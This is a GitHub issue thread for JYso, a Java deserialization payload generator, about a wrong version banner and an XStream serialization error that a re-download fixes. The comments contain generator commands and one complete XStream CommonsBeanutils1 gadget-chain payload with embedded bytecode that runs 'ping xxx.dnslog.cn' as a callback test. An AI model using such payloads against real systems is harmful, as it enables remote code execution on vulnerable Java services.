qi4L / JYso

It can be either a JNDIExploit or a ysoserial.
GNU General Public License v3.0

Incorrect CLI version number + error when running the XStream chain #58

Closed Mr-xn closed 1 day ago

Mr-xn commented 2 days ago
#java -version                                               
java version "1.8.0_411"
#java -jar JYso-1.3.4.jar -y -g ImageIO -p /usr/bin/gedit -xs
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.33
Error while generating or serializing payload
com.thoughtworks.xstream.InitializationException: Could not instantiate mapper : com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:627)
    at com.thoughtworks.xstream.XStream.buildMapper(XStream.java:596)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:568)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:496)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:465)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:411)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:350)
    at com.qi4l.JYso.gadgets.utils.Serializer.qiserialize(Serializer.java:89)
    at com.qi4l.JYso.controllers.ysoserial.ysoserial(ysoserial.java:193)
    at com.qi4l.JYso.Starter.main(Starter.java:37)
Caused by: java.lang.ClassNotFoundException: com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.core.util.CompositeClassLoader.loadClass(CompositeClassLoader.java:148)
    at java.lang.Class.forName0(Native Method)
    at java.lang.Class.forName(Class.java:348)
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:623)
    ... 9 more

qi4L commented 1 day ago

Fixed. Just re-download the 1.3.4 jar.

Mr-xn commented 1 day ago

😅 Still the same error... Could it be a problem with my environment?

#java -jar JYso-1.3.3.jar -y -x CommonsBeanutils1 -p 'ping xxx.dnslog.cn'
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.33
<java.util.PriorityQueue serialization="custom">
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class="org.apache.commons.beanutils.BeanComparator">
        <property>outputProperties</property>
        <comparator class="java.lang.String$CaseInsensitiveComparator"/>
      </comparator>
    </default>
    <int>3</int>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
      <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
        <default>
          <__name>a</__name>
          <__bytecodes>
            <byte-array>yv66vgAAADEAFgEAKG9yZy9hcGFjaGUvY29tbW9ucy9pbXBsL3hzL1hTRWxlbWVudERlY2wHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQwABQAGCgAEAAgBABFqYXZhL2xhbmcvUnVudGltZQcACgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAAwADQoACwAOAQAScGluZyB4eHguZG5zbG9nLmNuCAAQAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEgATCgALABQAIQACAAQAAAAAAAEAAQAFAAYAAQAHAAAAGgACAAEAAAAOKrcACbgADxIRtgAVV7EAAAAAAAA=</byte-array>
            <byte-array>yv66vgAAADQAEQEANG9yZy9hcGFjaGUvbWF2ZW4vYXJjaGl2ZS9waGFzZS9Bc3NlbWJseUFyY2hpdmVyUGhhc2UHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAGkFzc2VtYmx5QXJjaGl2ZXJQaGFzZS5qYXZhAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoFceZp7jxtRxgBAA1Db25zdGFudFZhbHVlAQAGPGluaXQ+AQADKClWDAAMAA0KAAQADgEABENvZGUAIQACAAQAAAABABoABwAIAAEACwAAAAIACQABAAEADAANAAEAEAAAABEAAQABAAAABSq3AA+xAAAAAAABAAUAAAACAAY=</byte-array>
          </__bytecodes>
          <__transletIndex>0</__transletIndex>
          <__indentNumber>0</__indentNumber>
        </default>
        <boolean>false</boolean>
      </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
    <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

#java -jar JYso-1.3.4.jar -y -g CommonsBeanutils1 -p 'ping xxx.dnslog.cn' -xs
 ┏┳┓┏    
  ┃┗┫┏┏┓ 
 ┗┛┗┛┛┗┛ version: 1.34
Error while generating or serializing payload
com.thoughtworks.xstream.InitializationException: Could not instantiate mapper : com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:627)
    at com.thoughtworks.xstream.XStream.buildMapper(XStream.java:596)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:568)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:496)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:465)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:411)
    at com.thoughtworks.xstream.XStream.<init>(XStream.java:350)
    at com.qi4l.JYso.gadgets.utils.Serializer.qiserialize(Serializer.java:89)
    at com.qi4l.JYso.controllers.ysoserial.ysoserial(ysoserial.java:193)
    at com.qi4l.JYso.Starter.main(Starter.java:37)
Caused by: java.lang.ClassNotFoundException: com.thoughtworks.xstream.mapper.EnumMapper
    at com.thoughtworks.xstream.core.util.CompositeClassLoader.loadClass(CompositeClassLoader.java:148)
    at java.lang.Class.forName0(Native Method)
    at java.lang.Class.forName(Class.java:348)
    at com.thoughtworks.xstream.XStream.buildMapperDynamically(XStream.java:623)
    ... 9 more

qi4L commented 1 day ago

[image]

qi4L commented 1 day ago

Try downloading it once more and see.

Mr-xn commented 1 day ago

> Try downloading it once more and see.

It works now, thanks.